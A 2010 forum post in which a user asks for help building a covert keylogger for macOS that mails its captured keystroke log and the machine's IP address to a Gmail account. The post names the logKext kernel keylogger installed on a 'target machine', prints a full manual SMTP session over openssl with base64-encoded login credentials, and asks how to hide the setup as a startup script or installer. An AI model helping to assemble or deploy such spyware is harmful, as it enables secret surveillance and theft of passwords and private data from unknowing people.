casio Posted June 30, 2010 Share Posted June 30, 2010 Hello Everybody. Let me just say right off that I am not a mac person. However, I am trying to program a keylog/IP mailer tied into OS X's kernel. The logger installed on the target machine is: code.google.com/p/logkext/ logKext is the best free open source key logger for OS X. I've set the logKext file to unencrypted for now, and I'm trying to attach the file in an email via openssl s_client. under "334 VXNlcm5hbWU6" is your email "example@gmail.com" converted to base64 and under "334 UGFzc3dvcmQ6" is your password "examplePASSWORD" converted to base64 base64 encoder tool here: http://www.motobit.com/util/base64-decoder-encoder.asp $ openssl s_client -crlf -connect smtp.gmail.com:465 CONNECTED(00000003) depth=1 /C=US/O=Google Inc/CN=Google Internet Authority verify error:num=20:unable to get local issuer certificate verify return:0 --- Certificate chain 0 s:/C=US/ST=California/L=Mountain View/O=Google Inc/CN=smtp.gmail.com i:/C=US/O=Google Inc/CN=Google Internet Authority 1 s:/C=US/O=Google Inc/CN=Google Internet Authority i:/C=US/O=Equifax/OU=Equifax Secure Certificate Authority --- Server certificate -----BEGIN CERTIFICATE----- MIIDWzCCAsSgAwIBAgIKFMs0nQADAAASjjANBgkqhkiG9w0BAQUFADBGMQswCQYD VQQGEwJVUzETMBEGA1UEChMKR29vZ2xlIEluYzEiMCAGA1UEAxMZR29vZ2xlIElu dGVybmV0IEF1dGhvcml0eTAeFw0xMDA0MjIyMDAyNDVaFw0xMTA0MjIyMDEyNDVa MGgxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpDYWxpZm9ybmlhMRYwFAYDVQQHEw1N b3VudGFpbiBWaWV3MRMwEQYDVQQKEwpHb29nbGUgSW5jMRcwFQYDVQQDEw5zbXRw LmdtYWlsLmNvbTCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAz4B46NG2l4Bk DdccddAuuOssQ4ZxCHoyj+ErdlEqZurVCoGQzAkhZTkzHrmIgYmM6roTbkF/zEaa 2ROe9s4VoL4OgUnoyB0u1KbwrG5PHBbsMdk0r6jMmhh+MORFVYgQrFxJnu8GnHiG W4QhmKVytu0FclYE+F1gOOx5qIgTVCMCAwEAAaOCASwwggEoMB0GA1UdDgQWBBS1 +KKmwdxtkpKkJgvwhZztqe0uszAfBgNVHSMEGDAWgBS/wDDr9UMRPme6npH7/Gra 42sSJDBbBgNVHR8EVDBSMFCgTqBMhkpodHRwOi8vd3d3LmdzdGF0aWMuY29tL0dv b2dsZUludGVybmV0QXV0aG9yaXR5L0dvb2dsZUludGVybmV0QXV0aG9yaXR5LmNy bDBmBggrBgEFBQcBAQRaMFgwVgYIKwYBBQUHMAKGSmh0dHA6Ly93d3cuZ3N0YXRp Yy5jb20vR29vZ2xlSW50ZXJuZXRBdXRob3JpdHkvR29vZ2xlSW50ZXJuZXRBdXRo b3JpdHkuY3J0MCEGCSsGAQQBgjcUAgQUHhIAVwBlAGIAUwBlAHIAdgBlAHIwDQYJ KoZIhvcNAQEFBQADgYEAUc39Y22ucA2N4mmDdPMC8DKbrRGlGMpC294mfh3yCkJa YRWjodFQSgCtFyKhTZ9roFpSEL0D4QxAtLSwtC0bSaSVusfAW3/CFgG/Cya724ic 9UoEosoG8CK+eGoGQuEsZ0xR86J5jOs2H+4QPHFCn594V7ZySzdeQi93YV31RBE= -----END CERTIFICATE----- subject=/C=US/ST=California/L=Mountain View/O=Google Inc/CN=smtp.gmail.com issuer=/C=US/O=Google Inc/CN=Google Internet Authority --- No client certificate CA names sent --- SSL handshake has read 1711 bytes and written 309 bytes --- New, TLSv1/SSLv3, Cipher is RC4-MD5 Server public key is 1024 bit Secure Renegotiation IS supported Compression: NONE Expansion: NONE SSL-Session: Protocol : TLSv1 Cipher : RC4-MD5 Session-ID: 22C21C4D84A0D9649906F6EB8775B94F44504EA733C3DE62F752C5FB69412649 Session-ID-ctx: Master-Key: 956F05DD954AB363CA629C57CA5B389829D0DF33D1FF5F6E19698AC4FEDF9DA02EE12E15D0835D1B 083CB88E20F7F66C Key-Arg : None Start Time: 1277702327 Timeout : 300 (sec) Verify return code: 20 (unable to get local issuer certificate) --- 220 mx.google.com ESMTP h8sm4265622ibk.3 helo 250 mx.google.com at your service auth login 334 VXNlcm5hbWU6 ZXhhbXBsZUBnbWFpbC5jb20= 334 UGFzc3dvcmQ6 ZXhhbXBsZVBBU1NXT1JE 235 2.7.0 Accepted mail from:<example@gmail.com> 250 2.1.0 OK h8sm4265622ibk.3 rcpt to:<example@gmail.com> 250 2.1.5 OK h8sm4265622ibk.3 data 354 Go ahead h8sm4265622ibk.3 Subject: test hello test . 250 2.0.0 OK 1277702414 h8sm4265622ibk.3 The '.' -period- after the space sends the email. Have not yet figured out how to add an attachment, which would include the unencrypted logKext file... I am assuming it will have to be in MIME format or converted to base64? Also thought it would be easy enough to add an IP mailer to this: $ hostname | nslookup >> /whatEVERfolderYOUwant/test.txt Any help at all with how to tie this all together as a startup script or in an installer app would be really helpful Preferably this would be tied into the OS X architecture as a startup script or a running perl process or something and not an AppleScript but really any help/suggestions/advice would be greatly appreciated also, bear in mind what I am trying to accomplish here is assuming you have physical access to the machine Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.